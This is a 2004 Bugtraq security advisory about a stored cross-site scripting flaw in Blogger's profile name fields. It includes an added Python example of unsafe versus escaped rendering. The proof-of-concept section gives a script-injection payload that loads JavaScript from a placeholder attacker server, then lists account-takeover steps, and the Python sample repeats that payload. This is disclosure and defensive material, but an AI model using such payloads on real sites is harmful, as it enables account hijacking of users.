[34261] in bugtraq


Blogger XSS Vulnerability

daemon@ATHENA.MIT.EDU (Ferruh Mavituna)
Fri Mar 26 16:47:49 2004

Message-ID: <20040326210538.10313.qmail@mail.securityfocus.com>
From: "Ferruh Mavituna" <ferruh@mavituna.com>
To: <bugtraq@securityfocus.com>
Date: Fri, 26 Mar 2004 23:07:18 +0200
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-9"
Content-Transfer-Encoding: 7bit

------------------------------------------------------
BLOGGER XSS VULNERABILITY
------------------------------------------------------
Online URL : http://ferruh.mavituna.com/article/?470
Severity : Moderately Critical for Members (Permanent User Account Hijacking)

------------------------------------------------------
ABOUT BLOGGER;
------------------------------------------------------
Blogger is a web-based tool that helps you publish to the web instantly --
whenever the urge strikes. Blogger is the leading tool in the rapidly
growing area of web publishing known as weblogs, or "blogs."

by Google (Pyra Labs acquired by Google)

------------------------------------------------------
XSS DETAILS;
------------------------------------------------------
There is no HTML filtering when rendering user profiles, so anyone can inject
a script into a profile's "First Name", "Last Name", etc. fields.

If you inject code into "First Name", it will be printed and executed on the
user's first page [www.blogger.com], so an attacker can easily take over the
victim's account.
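
The following is an added illustration, not code from the advisory or from
Blogger: it contrasts the vulnerable pattern the advisory describes (profile
fields concatenated into the page verbatim) with the fix (HTML-escaping every
field for the HTML text context before insertion), and adds a small audit
helper a defender could run over stored profile records to flag values that
contain markup. The profile record, template and placeholder host are all
constructed for the example.

```python
import html
import re

# Constructed sample profile (not data from the advisory). The first-name
# value mirrors the shape of the advisory's proof of concept, with an
# obviously fake placeholder host in place of any real server.
SAMPLE_PROFILE = {
    "first_name": '<script src="http://ATTACKER-SERVER-PLACEHOLDER/e.js"></script>',
    "last_name": "Smith",
}

# Hypothetical profile template; Blogger's real markup is not on the page.
TEMPLATE = '<div class="profile"><span>{first}</span> <span>{last}</span></div>'


def render_profile_unsafe(profile: dict) -> str:
    """Vulnerable rendering: field values are dropped into the template
    verbatim, so markup stored in "First Name" becomes live HTML and any
    <script> element in it runs in the viewing user's browser."""
    return TEMPLATE.format(first=profile["first_name"],
                           last=profile["last_name"])


def render_profile_safe(profile: dict) -> str:
    """Hardened rendering: every field is HTML-escaped (including quotes)
    before insertion, so stored markup is displayed as text, not executed.
    Output encoding at render time is the fix; a length limit on the input
    (the 50 characters the advisory mentions) is not."""
    return TEMPLATE.format(first=html.escape(profile["first_name"], quote=True),
                           last=html.escape(profile["last_name"], quote=True))


# Characters and sequences that never belong in a person's name; used only
# as an audit signal over already-stored data, not as the primary defence.
MARKUP_RE = re.compile(r"[<>]|javascript:", re.IGNORECASE)


def find_markup_fields(profile: dict) -> list:
    """Return the names of profile fields whose stored value contains
    markup-like content, so an operator can review or clean those records."""
    return [name for name, value in profile.items() if MARKUP_RE.search(value)]


if __name__ == "__main__":
    print("unsafe:", render_profile_unsafe(SAMPLE_PROFILE))
    print("safe:  ", render_profile_safe(SAMPLE_PROFILE))
    print("fields containing markup:", find_markup_fields(SAMPLE_PROFILE))
```

The safe renderer escapes at output time rather than relying on input
filtering, which is the property the advisory says Blogger lacked; the audit
helper is for finding records that were stored before escaping was in place.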

------------------------------------------------------
PROOF OF CONCEPT;
------------------------------------------------------
Inject [script src="http://[ATTACKER-SERVER]/EVIL-JS/"][/script] into the
victim's "First Name" field. Now you can execute anything remotely.

After logging in as your victim:
	  I. You can change the password (without the old password)
	 II. You can change the e-mail address without any confirmation
	III. You can take over the victim's blogs

* Replace [ and ] with < and >.
* Script injection is limited to 50 characters (but that is enough to
  include a JS script).


------------------------------------------------------
HISTORY;
------------------------------------------------------
Discovered : 2/22/2004
Vendor Informed : 2/25/2004
Published : 3/26/2004

------------------------------------------------------
VENDOR STATUS;
------------------------------------------------------
Contact established with Google, but there has been no answer.

Ferruh Mavituna
Web Application Security Specialist
http://ferruh.mavituna.com
ferruh@mavituna.com

PGPKey : http://ferruh.mavituna.com/PGPKey.asc

